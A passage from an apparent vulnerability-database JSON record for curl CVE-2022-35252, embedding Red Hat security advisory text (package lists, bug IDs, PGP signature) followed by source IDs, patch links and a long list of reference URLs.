See the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/release_notes/\n\nSecurity Fix(es):\n* CVE-2023-28856 redis: Insufficient validation of HINCRBYFLOAT command\n* CVE-2023-32314 vm2: Sandbox Escape\n* CVE-2023-32313 vm2: Inspect Manipulation\n\n3. Solution:\n\nFor Red Hat Advanced Cluster Management for Kubernetes, see the following\ndocumentation for details on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/install/installing#installing-while-connected-online\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2187525 - CVE-2023-28856 redis: Insufficient validation of HINCRBYFLOAT command\n2208376 - CVE-2023-32314 vm2: Sandbox Escape\n2208377 - CVE-2023-32313 vm2: Inspect Manipulation\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Low: curl security update\nAdvisory ID: RHSA-2023:2478-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2023:2478\nIssue date: 2023-05-09\nCVE Names: CVE-2022-35252 CVE-2022-43552\n====================================================================\n1. Summary:\n\nAn update for curl is now available for Red Hat Enterprise Linux 9. \n\nRed Hat Product Security has rated this update as having a security impact\nof Low. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64\n\n3. 
Description:\n\nThe curl packages provide the libcurl library and the curl utility for\ndownloading files from servers using various protocols, including HTTP,\nFTP, and LDAP. \n\nSecurity Fix(es):\n\n* curl: Incorrect handling of control code characters in cookies\n(CVE-2022-35252)\n\n* curl: Use-after-free triggered by an HTTP proxy deny response\n(CVE-2022-43552)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 9.2 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2120718 - CVE-2022-35252 curl: Incorrect handling of control code characters in cookies\n2152652 - CVE-2022-43552 curl: Use-after-free triggered by an HTTP proxy deny response\n\n6. Package List:\n\nRed Hat Enterprise Linux AppStream (v. 
9):\n\naarch64:\ncurl-debuginfo-7.76.1-23.el9.aarch64.rpm\ncurl-debugsource-7.76.1-23.el9.aarch64.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.aarch64.rpm\nlibcurl-debuginfo-7.76.1-23.el9.aarch64.rpm\nlibcurl-devel-7.76.1-23.el9.aarch64.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.aarch64.rpm\n\nppc64le:\ncurl-debuginfo-7.76.1-23.el9.ppc64le.rpm\ncurl-debugsource-7.76.1-23.el9.ppc64le.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.ppc64le.rpm\nlibcurl-debuginfo-7.76.1-23.el9.ppc64le.rpm\nlibcurl-devel-7.76.1-23.el9.ppc64le.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.ppc64le.rpm\n\ns390x:\ncurl-debuginfo-7.76.1-23.el9.s390x.rpm\ncurl-debugsource-7.76.1-23.el9.s390x.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.s390x.rpm\nlibcurl-debuginfo-7.76.1-23.el9.s390x.rpm\nlibcurl-devel-7.76.1-23.el9.s390x.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.s390x.rpm\n\nx86_64:\ncurl-debuginfo-7.76.1-23.el9.i686.rpm\ncurl-debuginfo-7.76.1-23.el9.x86_64.rpm\ncurl-debugsource-7.76.1-23.el9.i686.rpm\ncurl-debugsource-7.76.1-23.el9.x86_64.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.i686.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.x86_64.rpm\nlibcurl-debuginfo-7.76.1-23.el9.i686.rpm\nlibcurl-debuginfo-7.76.1-23.el9.x86_64.rpm\nlibcurl-devel-7.76.1-23.el9.i686.rpm\nlibcurl-devel-7.76.1-23.el9.x86_64.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.i686.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.x86_64.rpm\n\nRed Hat Enterprise Linux BaseOS (v. 
9):\n\nSource:\ncurl-7.76.1-23.el9.src.rpm\n\naarch64:\ncurl-7.76.1-23.el9.aarch64.rpm\ncurl-debuginfo-7.76.1-23.el9.aarch64.rpm\ncurl-debugsource-7.76.1-23.el9.aarch64.rpm\ncurl-minimal-7.76.1-23.el9.aarch64.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.aarch64.rpm\nlibcurl-7.76.1-23.el9.aarch64.rpm\nlibcurl-debuginfo-7.76.1-23.el9.aarch64.rpm\nlibcurl-minimal-7.76.1-23.el9.aarch64.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.aarch64.rpm\n\nppc64le:\ncurl-7.76.1-23.el9.ppc64le.rpm\ncurl-debuginfo-7.76.1-23.el9.ppc64le.rpm\ncurl-debugsource-7.76.1-23.el9.ppc64le.rpm\ncurl-minimal-7.76.1-23.el9.ppc64le.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.ppc64le.rpm\nlibcurl-7.76.1-23.el9.ppc64le.rpm\nlibcurl-debuginfo-7.76.1-23.el9.ppc64le.rpm\nlibcurl-minimal-7.76.1-23.el9.ppc64le.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.ppc64le.rpm\n\ns390x:\ncurl-7.76.1-23.el9.s390x.rpm\ncurl-debuginfo-7.76.1-23.el9.s390x.rpm\ncurl-debugsource-7.76.1-23.el9.s390x.rpm\ncurl-minimal-7.76.1-23.el9.s390x.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.s390x.rpm\nlibcurl-7.76.1-23.el9.s390x.rpm\nlibcurl-debuginfo-7.76.1-23.el9.s390x.rpm\nlibcurl-minimal-7.76.1-23.el9.s390x.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.s390x.rpm\n\nx86_64:\ncurl-7.76.1-23.el9.x86_64.rpm\ncurl-debuginfo-7.76.1-23.el9.i686.rpm\ncurl-debuginfo-7.76.1-23.el9.x86_64.rpm\ncurl-debugsource-7.76.1-23.el9.i686.rpm\ncurl-debugsource-7.76.1-23.el9.x86_64.rpm\ncurl-minimal-7.76.1-23.el9.x86_64.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.i686.rpm\ncurl-minimal-debuginfo-7.76.1-23.el9.x86_64.rpm\nlibcurl-7.76.1-23.el9.i686.rpm\nlibcurl-7.76.1-23.el9.x86_64.rpm\nlibcurl-debuginfo-7.76.1-23.el9.i686.rpm\nlibcurl-debuginfo-7.76.1-23.el9.x86_64.rpm\nlibcurl-minimal-7.76.1-23.el9.i686.rpm\nlibcurl-minimal-7.76.1-23.el9.x86_64.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.i686.rpm\nlibcurl-minimal-debuginfo-7.76.1-23.el9.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. 
Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2022-35252\nhttps://access.redhat.com/security/cve/CVE-2022-43552\nhttps://access.redhat.com/security/updates/classification/#low\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.2_release_notes/index\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2023 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBZFo0V9zjgjWX9erEAQhmTw/9FUwLCGRKCmddNVTMAaay54EPggJFOPKx\nnN06YIqiK5arkX4SD58YZrX9J0gUZcwGs6s5WO35pG3F+qJXhe8E8fbzavqRG5NB\noxG+pDC5+6xQxK41tkuLYJoUhF1w4yG8SuMSzroLcpbut/MAjKGGw4qgyNGit1Su\nxFGrDTyFxtj+tUZIQCil0HAqlXswQ7G2ukB9kQBpxNRfR0V2ANfmfkkGj8+xWauh\nL1PcaDezNWgAbgWbuf3mHNiwDMxWsNfcwCbx3P8sF+vRe7q5RdIFNL1oXJkPxQVy\nC6L29KcaLYxToNmUNyrOncWAj8KSlrDngVq3NXnG34lVzqz2t/ouc/0lX4Jc9qTL\nmGwYoXvlTqQgV4hGQPfDufApaukxgZfcSidSfqlNt1amYYNiYcvIyf15dht87ipB\n27ahZWDKvunB4gqMG62XNHyiu9bKmDCyL57ggUBt3wxJ7H9M/OgjsI7C/i/10SMT\nD75GjYaU2TWyGLd4SvbV6/3pA3zAZ0Ffqc66uANwfBXC7jFd2/ykEBir3vJYTq17\nr2YWYgH2sma5kwb7ZHQhLKk+N2a0g1KX+Mr0V2wJ+yAYwkbz6wu/BVDXstBFkumJ\n/iKmtOn0Mk07wo/3wvWu5M4tk4kZzmLzs1/ybH3GWOUbFUxbqgOos3/0Vi/uSW88\nYxf4bV/uBmU=HlZ2\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nVolSync is a Kubernetes operator that enables asynchronous replication of\npersistent volumes within a cluster, or across clusters. After deploying\nthe VolSync operator, it can create and maintain copies of your persistent\ndata. 
\n\nFor more information about VolSync, see:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html/add-ons/add-ons-overview#volsync\n\nor the VolSync open source community website at:\nhttps://volsync.readthedocs.io/en/stable/. \n\nSecurity fix(es): * CVE-2023-3089 openshift: OCP \u0026 FIPS mode\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n2212085 - CVE-2023-3089 openshift: OCP \u0026 FIPS mode\n\n5",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-35252"
},
{
"db": "VULHUB",
"id": "VHN-428403"
},
{
"db": "VULMON",
"id": "CVE-2022-35252"
},
{
"db": "PACKETSTORM",
"id": "168239"
},
{
"db": "PACKETSTORM",
"id": "170303"
},
{
"db": "PACKETSTORM",
"id": "170697"
},
{
"db": "PACKETSTORM",
"id": "170698"
},
{
"db": "PACKETSTORM",
"id": "176746"
},
{
"db": "PACKETSTORM",
"id": "172378"
},
{
"db": "PACKETSTORM",
"id": "172587"
},
{
"db": "PACKETSTORM",
"id": "172195"
},
{
"db": "PACKETSTORM",
"id": "174080"
}
],
"trust": 1.89
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2022-35252",
"trust": 2.7
},
{
"db": "HACKERONE",
"id": "1613943",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "168239",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202208-4523",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "170698",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2022.4343",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.6333",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4375",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3732",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.2163",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3143",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3060",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4374",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-428403",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2022-35252",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170303",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170697",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "176746",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "172378",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "172587",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "172195",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "174080",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-428403"
},
{
"db": "VULMON",
"id": "CVE-2022-35252"
},
{
"db": "PACKETSTORM",
"id": "168239"
},
{
"db": "PACKETSTORM",
"id": "170303"
},
{
"db": "PACKETSTORM",
"id": "170697"
},
{
"db": "PACKETSTORM",
"id": "170698"
},
{
"db": "PACKETSTORM",
"id": "176746"
},
{
"db": "PACKETSTORM",
"id": "172378"
},
{
"db": "PACKETSTORM",
"id": "172587"
},
{
"db": "PACKETSTORM",
"id": "172195"
},
{
"db": "PACKETSTORM",
"id": "174080"
},
{
"db": "CNNVD",
"id": "CNNVD-202208-4523"
},
{
"db": "NVD",
"id": "CVE-2022-35252"
}
]
},
"id": "VAR-202208-2263",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-428403"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T23:13:33.194000Z",
"patch": {
"_id": null,
"data": [
{
"title": "curl Security vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=206230"
},
{
"title": "Debian CVElist Bug Report Logs: curl: CVE-2022-35252: control code in cookie denial of service",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=f071eb46e3ac96bc3c50d0406c2d0685"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/JtMotoX/docker-trivy "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-35252"
},
{
"db": "CNNVD",
"id": "CNNVD-202208-4523"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-20",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-35252"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.8,
"url": "https://security.gentoo.org/glsa/202212-01"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20220930-0005/"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht213603"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht213604"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2023/jan/20"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2023/jan/21"
},
{
"trust": 1.7,
"url": "https://hackerone.com/reports/1613943"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html"
},
{
"trust": 1.0,
"url": "https://access.redhat.com/security/cve/cve-2022-35252"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-35252"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170698/apple-security-advisory-2023-01-23-6.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3143"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.2163"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3060"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-35252/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3732"
},
{
"trust": 0.6,
"url": "https://support.apple.com/en-us/ht213604"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/curl-denial-of-service-via-cookies-control-codes-39156"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168239/ubuntu-security-notice-usn-5587-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4374"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4343"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4375"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.6333"
},
{
"trust": 0.4,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.4,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-43552"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-43552"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-35260"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42916"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42915"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32221"
},
{
"trust": 0.2,
"url": "https://support.apple.com/downloads/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23497"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23505"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23499"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23508"
},
{
"trust": 0.2,
"url": "https://www.apple.com/support/security/pgp/"
},
{
"trust": 0.2,
"url": "https://support.apple.com/en-us/ht201222."
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#low"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2023-0361"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2023-27535"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-36227"
},
{
"trust": 0.1,
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1018831"
},
{
"trust": 0.1,
"url": "https://github.com/jtmotox/docker-trivy"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/curl/7.58.0-2ubuntu3.20"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5587-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/curl/7.81.0-1ubuntu1.4"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/curl/7.68.0-1ubuntu2.13"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22922"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27782"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27776"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27779"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30115"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22576"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22926"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27781"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22945"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32208"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32206"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32207"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27774"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27775"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32205"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-27780"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22923"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22946"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22947"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23507"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23493"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23504"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32915"
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht213604."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23502"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23518"
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht213603."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23517"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23513"
},
{
"trust": 0.1,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2152652"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2024:0428"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0428.json"
},
{
"trust": 0.1,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2179073"
},
{
"trust": 0.1,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2120718"
},
{
"trust": 0.1,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2179092"
},
{
"trust": 0.1,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2252030"
},
{
"trust": 0.1,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2196793"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.8_release_notes/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:2963"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3619"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-41674"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42721"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30594"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2196"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3625"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-43750"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30594"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-4129"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-41218"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-3239"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-3522"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-26341"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3239"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-25815"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42722"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1679"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2663"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3707"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-1582"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1462"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-22490"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-3028"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-20141"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-32314"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-47929"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-39188"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2663"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-32313"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3623"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-1999"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-26341"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3566"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1789"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3627"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1789"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-20141"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-28856"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2196"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-23454"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25265"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3524"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-39189"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33656"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3970"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3028"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3567"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33656"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-0394"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-0461"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33655"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-25652"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33655"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:3326"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3628"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3564"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-1195"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/install/installing#installing-while-connected-online"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-23946"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42703"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25265"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3522"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-29007"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1462"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1679"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:2478"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.2_release_notes/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-1667"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-2283"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-0361"
},
{
"trust": 0.1,
